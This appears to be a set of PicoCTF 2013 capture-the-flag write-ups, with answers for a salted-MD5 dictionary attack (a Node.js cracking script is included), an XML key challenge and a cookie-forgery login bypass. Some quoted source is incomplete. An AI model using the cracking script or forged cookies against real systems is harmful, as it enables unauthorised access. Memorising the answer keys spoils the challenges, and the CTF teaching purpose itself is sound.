We focus on the **salt** `5948` and the **hashed password** `02ed2bf40532f187ec9334ef37f75591`. These two values differ from machine to machine, but the process is the same:

`md5(cleartext password + salt) => hashed password`

This [script](trythemall.js) brute-forces the cleartext password using the [standard Linux cracklib dictionary](cracklib-small.txt). To run it you need [Node.js](http://nodejs.org/download/), and remember to edit the salt and hash in trythemall.js to match your own values.

**Answer:** allege

## Other write-ups and resources

* none yet

--------------------------------------------------------------------------------
/pico-ctf-2013/try-them-all/trythemall.js:
--------------------------------------------------------------------------------
// Dictionary attack on md5(password + salt). Edit SALT and TARGET for your instance.
var fs = require("fs");
var crypto = require("crypto");

var SALT = "5948";
var TARGET = "02ed2bf40532f187ec9334ef37f75591";

var words = fs.readFileSync("cracklib-small.txt", "utf8").split("\n");
for (var i = 0; i < words.length; i++) {
    var word = words[i].trim();   // drop a stray "\r" or surrounding whitespace
    if (!word) {
        continue;
    }
    var md5sum = crypto.createHash("md5").update(word + SALT).digest("hex");
    if (md5sum === TARGET) {
        console.log(word);
        break;
    }
}

--------------------------------------------------------------------------------
/pico-ctf-2013/xmlol/README.md:
--------------------------------------------------------------------------------
# PicoCTF 2013: XMLOL

**Category:** WebVuln
**Points:** 30
**Description:**

> The book has instructions on how to dump the corrupted configuration file from the robot's memory. You find a corrupted [XML file](https://2013.picoctf.com/autoproblems/tmpVrg2Ah.xml) and are looking for a configuration key.
>
> [file offline](tmpVrg2Ah.xml)

## Write-up

View the source with `Ctrl+U`; the key is right there in the file:

```xml
534987452539085818703732732882
```

**Answer:** 534987452539085818703732732882

## Other write-ups and resources

* none yet

--------------------------------------------------------------------------------
/pico-ctf-2013/xmlol/tmpVrg2Ah.xml:
--------------------------------------------------------------------------------
534987452539085818703732732882

--------------------------------------------------------------------------------
/pico-ctf-2013/yummy/README.md:
--------------------------------------------------------------------------------
# PicoCTF 2013: Yummy

**Category:** Web Vuln
**Points:** 60
**Description:**

> You want to find out the docking bay numbers for space ships that are ready to launch. Luckily for you, [the website](https://2013.picoctf.com/problems/yummy) for the docking bay ship status page doesn't seem so secure....
>
> Enter the docking bay for any of the ships that are awaiting launch.

## Write-up

View the page source (`Ctrl+U`):

```html
Docking Bay Ship Status

Login Failure

You are not authorized to view this page.
```

The important part is `Expected Cookie: "authorization=administrator"`.

With a tool such as [EditThisCookie](https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg), add a cookie `authorization=administrator`; the page then displays the list.

We need "the docking bay for any of the ships that are **awaiting launch**."

**Answer:** `DX6-7` or `DX7-2` or `DX9-5` or `DX4-9`

## Other write-ups and resources

* none yet

--------------------------------------------------------------------------------
/pico-ctf-2013/yummy/yummy.php:
--------------------------------------------------------------------------------
SpacePort Authentication Server

Docking Bay Ship Status

Login Success.

<table>
<tr><td>Docking Bay</td><td>Ship Designation</td><td>Status</td></tr>
<tr><td>DX9-2</td><td>Proud Planetary Prowler</td><td>Under Repair</td></tr>
<tr><td>DX5-2</td><td>Century Eagle</td><td>Fuelling</td></tr>
<tr><td>DX6-7</td><td>USS Franchise</td><td>Awaiting Launch</td></tr>
<tr><td>DX7-1</td><td>HMS Beagle</td><td>Under Repair</td></tr>
<tr><td>DX7-2</td><td>Pwnie Express</td><td>Awaiting Launch</td></tr>
<tr><td>DX9-5</td><td>Happy Fun Time Awesome Best Ship</td><td>Awaiting Launch</td></tr>
<tr><td>DX2-2</td><td>Roflcopter</td><td>Under Repair</td></tr>
<tr><td>DX4-5</td><td>YHXS-2 Ghost</td><td>Under Repair</td></tr>
<tr><td>DX4-9</td><td>Theseus</td><td>Awaiting Launch</td></tr>
<tr><td>DX8-2</td><td>Drone DK97</td><td>Fuelling</td></tr>
</table>
END;
}
else {
    echo <<<END
Login Failure

You are not authorized to view this page.
END;
    echo "";
}
?>

--------------------------------------------------------------------------------